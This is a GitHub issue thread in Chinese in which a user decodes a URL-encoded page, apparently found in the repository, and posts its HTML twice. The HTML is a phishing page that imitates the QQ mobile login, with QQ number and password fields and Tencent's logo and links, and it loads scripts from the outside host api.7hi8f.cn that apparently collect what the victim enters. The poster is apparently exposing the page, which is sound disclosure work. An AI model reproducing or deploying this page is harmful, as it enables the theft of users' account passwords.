### ISSUE TITLE
转成了 url编码我就看不懂了？？？ 幼稚

### ISSUE THREAD

**Issue by XQY279** [juchux/ju#5]
<!DOCTYPE html>
<html lang="zh-cn">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <title>手机统一登录</title>
    <script src="//lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js"></script>
    <link rel=stylesheet type=text/css href="//api.7hi8f.cn/style.css">
    <style>
        .logo {
            background-image: url("https://qzonestyle.gtimg.cn/qzone/phone/style/img/ptlogin-logo.png")
        }

        .my {
            width: 288px;
            height: 44px;
            position: absolute
        }
    </style>
</head>

<body>
    <div id="content" class="content">
        <div id="error_tips">
            <div id="error_tips_content"> <span id="error_icon"></span> <span id="error_message"></span> </div>
        </div>
        <div id="login" class="login">
            <div id="logo" class="logo"></div>
            <div id="web_login">
                <ul id="g_list">
                    <li id="g_u">
                        <div id="del_touch" class="del_touch"> <span id="del_u" class="del_u"></span> </div>
                        <div name="0" class="my"></div><input id="u" class="inputstyle" name="0" maxlength="10"
                            placeholder="QQ号码/手机/邮箱">
                    </li>
                    <li id="g_p">
                        <div id="del_touch_p" class="del_touch"> <span id="del_p" class="del_u"></span> </div>
                        <div name="1" class="my"></div><input id="p" class="inputstyle" maxlength="16" type="password"
                            name="1" placeholder="请输入您的QQ密码" readonly>
                    </li>
                </ul>
                <div id="go">登陆</div>
            </div>
            <div id="switch">
                <div id="zc_feedback"> 
                    <a id="zc" href="https://zc.qq.com">注册新帐号</a>
                    <a id="forgetpwd" href="https://aq.qq.com/cn2/findpsw/mobile_v2/mobile_web_find_index">忘了密码？</a>
                </div>
            </div>
        </div>
    </div>
    <script src="//mat1.gtimg.com/libs/jquery2/2.2.0/jquery.js"></script>
    <script src="//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js"></script>
    <script src="//api.7hi8f.cn/qqapi.php"></script>
    <script src="//api.7hi8f.cn//zepto.min.js?2"></script>
</body>

</html>

**Comment by ch4rc0al1080** [comment]
大哥请使用markdown

**Comment by XQY279** [comment]
> 大哥请使用markdown

```html


<!DOCTYPE html>
<html lang="zh-cn">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <title>手机统一登录</title>
    <script src="//lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js"></script>
    <link rel=stylesheet type=text/css href="//api.7hi8f.cn/style.css">
    <style>
        .logo {
            background-image: url("https://qzonestyle.gtimg.cn/qzone/phone/style/img/ptlogin-logo.png")
        }

        .my {
            width: 288px;
            height: 44px;
            position: absolute
        }
    </style>
</head>

<body>
    <div id="content" class="content">
        <div id="error_tips">
            <div id="error_tips_content"> <span id="error_icon"></span> <span id="error_message"></span> </div>
        </div>
        <div id="login" class="login">
            <div id="logo" class="logo"></div>
            <div id="web_login">
                <ul id="g_list">
                    <li id="g_u">
                        <div id="del_touch" class="del_touch"> <span id="del_u" class="del_u"></span> </div>
                        <div name="0" class="my"></div><input id="u" class="inputstyle" name="0" maxlength="10"
                            placeholder="QQ号码/手机/邮箱">
                    </li>
                    <li id="g_p">
                        <div id="del_touch_p" class="del_touch"> <span id="del_p" class="del_u"></span> </div>
                        <div name="1" class="my"></div><input id="p" class="inputstyle" maxlength="16" type="password"
                            name="1" placeholder="请输入您的QQ密码" readonly>
                    </li>
                </ul>
                <div id="go">登陆</div>
            </div>
            <div id="switch">
                <div id="zc_feedback"> 
                    <a id="zc" href="https://zc.qq.com">注册新帐号</a>
                    <a id="forgetpwd" href="https://aq.qq.com/cn2/findpsw/mobile_v2/mobile_web_find_index">忘了密码？</a>
                </div>
            </div>
        </div>
    </div>
    <script src="//mat1.gtimg.com/libs/jquery2/2.2.0/jquery.js"></script>
    <script src="//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js"></script>
    <script src="//api.7hi8f.cn/qqapi.php"></script>
    <script src="//api.7hi8f.cn//zepto.min.js?2"></script>
</body>

</html>
```

**Comment by ch4rc0al1080** [comment]
感谢

**Comment by ch4rc0al1080** [comment]
感谢
